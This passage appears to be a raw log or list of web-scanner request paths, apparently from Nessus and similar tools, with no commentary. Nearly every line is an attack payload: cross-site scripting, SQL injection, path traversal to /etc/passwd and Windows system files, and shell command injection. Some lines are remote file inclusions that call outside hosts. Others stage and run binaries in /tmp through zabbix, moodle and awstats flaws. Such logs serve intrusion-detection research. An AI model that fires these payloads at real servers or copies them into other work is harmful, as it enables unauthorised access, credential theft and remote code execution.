src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/upload.cgi\n/manager/admin/admin.php?sid=0'\n/modules.php?name=search&file=../../../../../../../../../../etc/passwd\\x00\n/cgi-binmessagedetail.asp?msg_id='\n/main.php?logout='sleep\\x098\\x09#\n/l752x1ry.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/search.jsp?q=%\"<script>alert(1331904373)</script>\n/examples/jsp/sessions/texis.exe/nessus\n/rv98iwjp.do?<script>cross_site_scripting.nasl</script>\n/h4bi26jd.aspx?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/admin/login.php?path=\\\"></form><form name=a><input name=i value=xss>&lt;script>alert('vulnerable')</script>\n/phpmyadmin/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/o1zj4u9v.jsp?<script>document.cookie=\"testabrn=6368;\"</script>\n/subscriptions.py\n//<body><script src=http://www.example.com/test?rnd=q64732494></script>\n/scriptorium/\n/javascript/date.exe\n/cgi-bin/index.php?user_langue=../../../../../../../../../../etc/passwd\n/scripts/c0kha6w3apd3.cfm\n/main.php?logout=\"&ver;>q32916572&rem;\n/scripts\n/scripts/www/delivery/ac.php?bannerid=-193+or+1=1\n/scriptpath/index.php?page=http://cirt.net/rfiinc.txt?\n/examples/jsp/error/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/examples/jsp/jsp2/jspx/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/qczkquis.asp?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/ap58k3ci.jsp?<script>cross_site_scripting.nasl</script>\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1332009308,4,5\n/top.php?stuff=ping;-w;7000;-n;1;1.2.3.4|rem;\n/6qbynt4f.asp?<script>cross_site_scripting.nasl</script>\n/gy23xnjq.html?<script>cross_site_scripting.nasl</script>\n/..\\/\\..\\/\\..\\/\\boot.ini\n/examples/jsp/num/shopaddtocart.asp?productid='42\n/help.php?q=';del q86575497 #\n/examples/jsp/error/newsdesk.cgi?t=../../../../../../etc/passwd\n/examples/jsp/checkbox/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/examples/jsp/checkbox/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/quagynka.exe?<script>cross_site_scripting.nasl</script>\n/1r8cfrlf.asp?<script>document.cookie=\"testydan=5106;\"</script>\n/examples/jsp/colors/notify?from=nessus\"|id\"\n/scripts/wx4z4gedhl0l.html\n/cgi-bin/productsbycategory.asp?intcatalogid=3'&strcatalog_name=nessus\n/aj3pf49c.fts?<script>document.cookie=\"testnofv=4170;\"</script>\n/x7pclv4s.do?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/ap58k3ci.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/addressbook/index.php?surname=<script>alert('vulnerable')</script>\n/d765w06j.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/.passwd.cfm\n/fa8p8lr8.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/search.php?searchfor=\\\"><script>alert(1776)</script>\n/fmnveedu.kspx?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/b1q8bywu.kspx?<script>cross_site_scripting.nasl</script>\n/javascript/sling.exe\n/help.php?q=\"\\x0ddel\\x09q14674684\\x09#\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/dhbiyrztiq0+>+/dev/null+&').\"]=1\n/<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/examples/jsp/checkbox/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/forum.asp?n=/etc/passwd\\x00|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/en-us/jnv890lt.html?<script>cross_site_scripting.nasl</script>\n/egaet53a.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/t3af3tdz.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=;del q47158875 #\n/module/forum/forum.php?fd=http://192.168.202.118:8080/tzhfyzkbomspvm?=';\n/help.php?q=\"ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/nyvbv05h.do?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='594147117\n/</a><script>alert(\"xss\")</script>\n/index.php?page=../../../../../../../../../../etc/passwd\n/top.php?stuff=\"uname #\n/examples/jsp/jsp2/el/ovlaunch.exe\n/m4kkjf8l.htm?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/top.php?stuff=ver\\x09>q64218613&rem\\x09\n/scripts/index.php?id=egyb16sayu'\n/examples/jsp/jsp2/jspx/lang/lang.php?lang_path=/etc/passwd\\x00\n/help.php?q=ver >q35544262&rem \n/help.php?q='\\x0duname >q58812882 #\n/javascript/document.cnf\n/ows-bin/oasnetconf.exe?-l -s blahblah\n/cgi-bin/webbbs.exe\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/moclyxlwqyfjnp?'\n/notice-description/\n/fmnveedu.mscgi?<script>document.cookie=\"testgfbr=7014;\"</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+a+5f5+>>esbq\n/examples/jsp/cal/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/javascript/note.exe\n/<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/admin/config.php?display=1'or1=1\n/main.php?stuff=\"|ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/o6ebbirj.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripten/\n/examples/servlets/servlet/showcat.php?cat=1'\n/xsqln7eb.htm?<script>document.cookie=\"testpcbb=9254;\"</script>\n/examples/jsp/error/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/iissamples/sdk/asp/docs/winmsdp.exe?source=/iissamples/\\xc0\\xae\\xc0\\xae/default.asp\n/qczkquis.cgi?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/rpxyx07v.asp?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/mail.php?id='/**/union/**/select/**/1,2,1332008335,4--&blog=1\n/9o6g5vkn.aspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/index.php?configfile=../../../../../../../../../etc/passwd\n/cacti/mail.php?id='/**/union/**/select/**/1,2,1331905235,4--&blog=1\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331923203,1242183873 -- \n/en-us/account/pfdispaly.cgi?../../../../../../etc/passwd\n/transcript-6/\n/profile.php?user='<iframe src=javascript:alert(%27wvs-xss-magic-string-410026083323%27)></iframe>\n/en-us/i686v90l.aspx?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/help.php?q=\"rm q97915511&rem \n/hipkz026.jsp?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/oie504mr.dll?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/fo564rei.dll?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"del\\x0bq49522765&rem\\x0b\n/javascript/insert.exe\n/h4bi26jd.htm?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/en-us/jnv890lt.pl?<script>cross_site_scripting.nasl</script>\n/javascript/inc.exe\n/examples/jsp/num/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/examples/jsp/colors/phptonuke.php?filnavn=/etc/passwd\n/hoteldescription/\n/scripts/event_view.php?eid=34 union select 692795576\n/recordings/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/h4bi26jd.php?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/bn857frh.pl?<script>cross_site_scripting.nasl</script>\n/main.php?frm_daynight=q68663511&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904243,4,5\n/javascript/50.exe\n/citrix/metaframexp/default/login.asp?nfuse_logoutid=&nfuse_messagetype=error&nfuse_message=<script>alert('ritchie')</script>&clientdetection=on\n/phpmyadmin/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/0z575z74.cfm?<script>document.cookie=\"testuhsv=9753;\"</script>\n/scripts/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/main.php?stuff=\"&rm\\x0bq12538123&rem\\x0b\n/?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/scripts/forum.php?forum=-1 union select null,123456,null,null,null,null--\n/examples/jsp/checkbox/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/frznctvhi0i5?\\x00\n/top.php?stuff=\"ver\\x0b>q24192811&rem\\x0b\n/examples/jsp/num/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/ahn'qiraj/\n/admin/common/script.js.php~\n/top.php?stuff=\"ping -w 9000 -n 1 1.2.3.4&rem \n/byrg33fw.asp?<script>document.cookie=\"testexuu=5340;\"</script>\n/cacti/shopexd.asp?catalogid='42\n/examples/jsp/checkbox/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=q25559316\n/fmnveedu.aspx?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/javascript/htpasswd.sh\n/x2gyorli.php3?<script>document.cookie=\"testwhac=3130;\"</script>\n/actionscriptcode1/\n/9kr0ih0v.jspa?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/d5a5renl.php3?<script>cross_site_scripting.nasl</script>\n/recordings/core/editor.php?editor_insert_bottom=/etc/passwd\n/qb2xy9aw.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/simple/view_page?mv_arg=|cat /etc/passwd|\n/oie504mr.mscgi?<script>document.cookie=\"testtpby=7052;\"</script>\n/scripts/prnnucptkixl.pl\n/scripts/callboth.php?seq=654321&out=123456&in=1331905185@nessus\\x0d\\x0aasteridex_in_code_injection.nasl\n/help.php?q='uname\\x09>q77922174\\x09#\n/script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.118:8080/2aibfaczmac8??\n/nukescripts/\n/examples/jsp/sessions/a1disp3.cgi?/../../../../../../etc/passwd\n/top.php?stuff=\"\\x0duname\\x09>q29585118\\x09#\n/scripts/n4p4f4gtbhia.cgi\n/read.php?pagenum_rsread=1&totalrows_rsread=<script>alert('wvs-xss-magic-string-414546083580')</script>\n../../../../../../../../../../etc/passwd\n/manager/add_url.htm?node=<script>alert('xss')</script>\n/modif_infos.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini\n/phpmyadmin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/examples/jsp/checkbox/shopper.cgi?newpage=../../../../../../etc/passwd\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/zz5thkvtmlgl?'\n/byrg33fw.jspa?<script>document.cookie=\"testexuu=5340;\"</script>\n/scripts/zq9frlz6fcfp.inc\n/blue's/\n/manager/newsscript.pl?mode=admin\n/j4drbkil.kspx?<script>cross_site_scripting.nasl</script>\n/cgi-bin/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/examples/jsp/sessions/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/scripts/pssdseehtgdp.inc\n/xfkun1ku.dll?<script>cross_site_scripting.nasl</script>\n/l752x1ry.jspa?<script>cross_site_scripting.nasl</script>\n/<script>document.cookie=\"testblcp=8120;\"</script>\n/eei78ore.pl?<script>cross_site_scripting.nasl</script>\n/scripts/c0kha6w3apd3.sh\n/xsqln7eb.fts?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/javascript/pwd.exe\n/manager/search.jsp?q=%\"<script>alert(1331904373)</script>\n/javascript/owl.exe\n/cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\\x00\n/scripts/manage/login.asp\n/<script>document.cookie=\"testyglc=8988;\"</script>\n/report.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8??\n/top.php?stuff=\"&rm\\xa0q97411474&rem\\xa0\n/free-scripts/\n/examples/servlets/servlet/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/cgi-915/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/scripts/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/byrg33fw.htm?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/cp job description 2006/\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/ghl9il?\n/i2n4v4rl.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/cgi-home/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/help.php?q=\"uname\\x09>q12928131\\x09#\n/\\..\\..\\..\\..\\winnt\\win.ini\n/top.php?stuff=;sleep\\x097\\x09#\n/j2kdmfw4.jsp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/help.php?q=\"ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/manager/starnet/addons/slideshow_full.php?album_name='1751116086\n/static//./../../../../../../../.etc/passwd\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1332010400,529560500 --\n/_vti_bin/shtml.exe?_vti_rpc\n/javascript/changes.exe\n/iisprotect/admin/siteadmin.asp?v_sitename=&v_firsttab=groups&v_secondtab=all&groupname=nessus'\n/0u75ldxq.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=ver;>q25171792&rem;\n/examples/jsp/cal/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904181&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/help.php?q=\"ver;>q77231587&rem;\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--\n/main.php?stuff=ver&rem;\n/readmore.php?config[\\\"sipssys\\\"]=http://cirt.net/rfiinc.txt?\n/recordings/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/?<script>document.cookie=\"testbgqj=6434;\"</script>\n/main.php?logout=\";del q32339726 #\n/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/scripts/tomcat_proxy_directory_traversal.nasl1332010400\n/hipkz026.asp?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/securescripting/\n/index.php?id=mumrj3sj0o'\n/cgi-bin/index.php?cat='\n/0rufe52p.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/en-us/n9xlumt5.mscgi?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=ver\\x0c>q49699449&rem\\x0c\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/main.php%3fstuff%3d1985387140&frm_user=&scr_height=q52912831&scr_width=\n/jw64yq8u.x?<script>document.cookie=\"testylfu=1313;\"</script>\n/hjdzm96v.idc?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/ldlivpaolb0;').\"]=1\n/ybz5rz7a.cfm?<script>document.cookie=\"testsbvw=6289;\"</script>\n/en-us/hipkz026.cfm?<script>document.cookie=\"testyrbs=2855;\"</script>\n/cgi-win/testcgi.exe\n/help.php?q=@'\n/oldtranscripts/\n/o35zot2r.cfc?<script>cross_site_scripting.nasl</script>\n/javascript/alpha.exe\n/help.php?q='&uname >q65268232 #\n/7uz3ok60.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/t99iadgtkf9h.inc\n/scriptkiddies/\n/w4996nr0.do?<script>document.cookie=\"testttvs=7163;\"</script>\n/cgi-bin/store.php?crn=42'&action=show&show_products_mode=cat_click\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/top.php?stuff=\"|ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/0qhcnefz.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff='&del q83741819 #\n/javascript/tmps.exe\n/top.php?stuff=\"&ping;-w;9000;-n;1;1.2.3.4&rem;\n/scripts/ylrvly9nh_pf.php3\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/2aibfaczmac8?'\n/javascript/it.exe\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"zj\\0003x\\0315\\0200xp1\\0322\\0262\\0377\\0266\\0377\\0001\\0320\" >> /tmp/yzicxmyifv0;echo|awstats957386.txt\n/fcgi-bin/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/examples/jsp/num/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.96:8080/ipb5ri?\n/javascript/axis2.exe\n/d765w06j.x?<script>cross_site_scripting.nasl</script>\n/what's new grandstream sale/\n/cgi-bin/notify?from=nessus\"|id\"\n/main.php?stuff=&ver >q24433373&rem \n/xboxsubscriptionplan/\n/apavxugx.php3?<script>document.cookie=\"testdnbh=5237;\"</script>\n/xsqln7eb.php?<script>document.cookie=\"testpcbb=9254;\"</script>\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331905220','5'--\n/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/examples/servlets/servlet/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/txenjrxf3?\\x00\n/examples/jsp/sessions/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/tukodz3j.kspx?<script>cross_site_scripting.nasl</script>\n/5o9zq43e.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.118:8080/2aibfaczmac8?\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+10+00+00+00+20+00+00+00+00+40+00+00+10+00+00+00+02+00+00+04+00+00+00+00++>>esbq\n/o6ebbirj.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/redirect.php/\"><script>alert(413055588068)</script>?subject=server&server=test\n/phpnews/sendtofriend.php?mid='1'\n/symantec sued for labeling product 'adware'/\n/ju0u7kfo.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6wb70v0b.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/.htaccess.sfish/'`true`'\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/whmch8ftkt7kv?\n/quagynka.dll?<script>cross_site_scripting.nasl</script>\n/javascript/htpasswd.pdf\n/sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>\n/aj3pf49c.jsp?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/cgi-bin/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/x7pclv4s.jspa?<script>document.cookie=\"testiulz=3709;\"</script>\n/<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/prescriptionviagra/\n/main.php?logout=\"del q41454446&rem \n/i686v90l.nsf?<script>document.cookie=\"testfutf=1550;\"</script>\n/o6ebbirj.jsp?<script>cross_site_scripting.nasl</script>\n/javascript/signon.exe\n/main.php?stuff='\\x0auname #\n/help.php?q=\";rm q43236884 #\n/3m5knyc4.php?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/main.php?stuff=\"&ping\\x09-w\\x0910000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/pam_script/\n/examples/jsp/checkbox/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/scripts/forum/hcspecific/enableforum.asp?action=enableforum&forumid='hosting_controller_forumid_sql_injection.nasl\n/r3le3om5.htm?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"ver\\x09>q42253935&rem\\x09\n/6dlc2zm9.aspx?<script>document.cookie=\"testqpux=4016;\"</script>\n/d7ktpmcq.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/export.exe\n/scripts/rest/api/2.0.alpha1/serverinfo\n<script>document.cookie=\"testotoy=6142;\"</script>\n/javascript/bin.exe\n/javascript/document.tar.gz\n/file_smbpasswd/\n/scriptsite_information/\n/examples/jsp/sessions/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/examples/jsp/cal/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://cirt.net/rfiinc.txt?\\x00\n/vwmg565s.html?<script>cross_site_scripting.nasl</script>\n/de3v2dd9.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/rbec2ohx.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/index.php?post=../config/password\n/eei78ore.cfc?<script>cross_site_scripting.nasl</script>\n/cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah\n/examples/jsp/cal/pfdispaly.cgi?../../../../../../etc/passwd\n/usr/extensions/get_infochannel.inc.php?root_path=http://cirt.net/rfiinc.txt??cmd=id;pwd\n/descriptionvakkengids/\n/?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/scripts/6gl21a1hiz3s.shtml\n/javascript/eng.exe\n/i7prbs22.exe?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/javascript/.passwd.htm\n/script/menu/menuprincipal.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?\n/javascript/htpasswd.old\n/scripts/www/delivery/ac.php?bannerid=-206+or+1=1\n/help.php?q=\"del,q58627156&rem,\n/cgi-bin/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.96:8080/4dckqcc0acprbz?\n/examples/jsp/num/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/en-us/i686v90l.aspx?<script>document.cookie=\"testfutf=1550;\"</script>\n/help.php?q=\"|ping -w 9000 -n 1 1.2.3.4|rem \n/mpcgi/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/cgi-915/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/examples/jsp/sessions/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/scriptpath/index.php?page=http://192.168.202.118:8080/ghl9il?\n/6dlc2zm9.kspx?<script>document.cookie=\"testqpux=4016;\"</script>\n/ttxssh2_100alpha3/\n/scripts/index.php?edit=nonexistant1597386916\n/tuwjta1w.cgi?<script>document.cookie=\"testpokn=7494;\"</script>\n/i686v90l.jspa?<script>document.cookie=\"testfutf=1550;\"</script>\n/top.php?stuff=&ver,>q82213421&rem,\n/ydexw8by.asp?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/7uz3ok60.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/athenareg.php?pass= ;id\n/en-us/static/@95063:81/app/launcher/scripts/tabify.js\n/my sister's hot friend - sativa rose/\n/cross-site_scripting/\n/examples/jsp/colors/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/help.php?q=rm;q42148333&rem;\n/examples/jsp/jsp2/el/pfdispaly?../../../../../../etc/passwd\n/phpmyadmin/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+4c+cd+21+54+68+69+73+20+70+72+6f+67+72+61+6d+20+63+61+6e+6e+6f+74+20+62+65++>>ctdn\n/examples/jsp/sessions/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/main.php?logout=\"del q44662571 #\n/subscriptions.inc\n/wanted pictures of escaped killers 'breach their human rights'/\n/h21y8w52.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/perl.exe?-v\n/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/top.php?stuff=\"\\x0arm q63768352 #\n/namesxss/\n/jnt3f86c.mscgi?<script>document.cookie=\"testcmax=9270;\"</script>\n/get.php?username=<br><b>force_xss_for_test</b><br>\n/xsqln7eb.cfc?<script>document.cookie=\"testpcbb=9254;\"</script>\n/../webserver.ini\n/main.php?frm_daynight=day&frm_passwd=q66334283&frm_referer=http%3a//192.168.24.202/top.php%3fstuff%3d1583574484&frm_user=&scr_height=&scr_width=\n/examples/jsp/checkbox/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/digitale camera's/\n/en-us/account/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/emailfriend/emailfaq.php?id=\\\"<script>alert(document.cookie)</script>\n/phpmyadmin/print.php?what=article&id='\n/webcgi/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/top.php?stuff=\";rm q35544877 #\n/examples/servlets/servlet/admin/admin.php?sid='\n/j4drbkil.html?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/help.php?q=\\x0auname >q17379542 #\n/en-us/<script>cross_site_scripting.nasl</script>.mscgi\n/j2kdmfw4.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd\n/<script>document.cookie=\"testuhsv=9753;\"</script>\n/top.php?stuff=;rm\\x09q71367433\\x09#\n/scripts/index.php?id='union/**/select/**/0,0,20217353,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/tukodz3j.fts?<script>cross_site_scripting.nasl</script>\n/subscriptions.fcgi\n/rbec2ohx.mscgi?<script>cross_site_scripting.nasl</script>\n/fo564rei.x?<script>cross_site_scripting.nasl</script>\n/3hlysl2x.asp?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/6qbynt4f.nsf?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/index.php?act=arcade&do=stats&gameid=1'\n/news.php?config[script_path]=http://cirt.net/rfiinc.txt??\n/phpmyadmin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--\n/script/gestion/index.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?\n/examples/jsp/error/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/azcrfs8d.fts?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/javascript/wwwboard.exe\n/u8yiqilu.kspx?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/bzuf9ozq.nsf?<script>cross_site_scripting.nasl</script>\n/h5i6crm3.html?<script>document.cookie=\"testlihk=7070;\"</script>\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/frznctvhi0i5?\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\\x00\n/examples/jsp/num/cvslog.cgi?file=<script>window.alert</script>\n/examples/jsp/colors/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/manager/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/cgis/ion-p.exe?page=c:\\winnt\\repair\\sam\n/cgi-bin/whois_raw.cgi?fqdn=\\x0acat 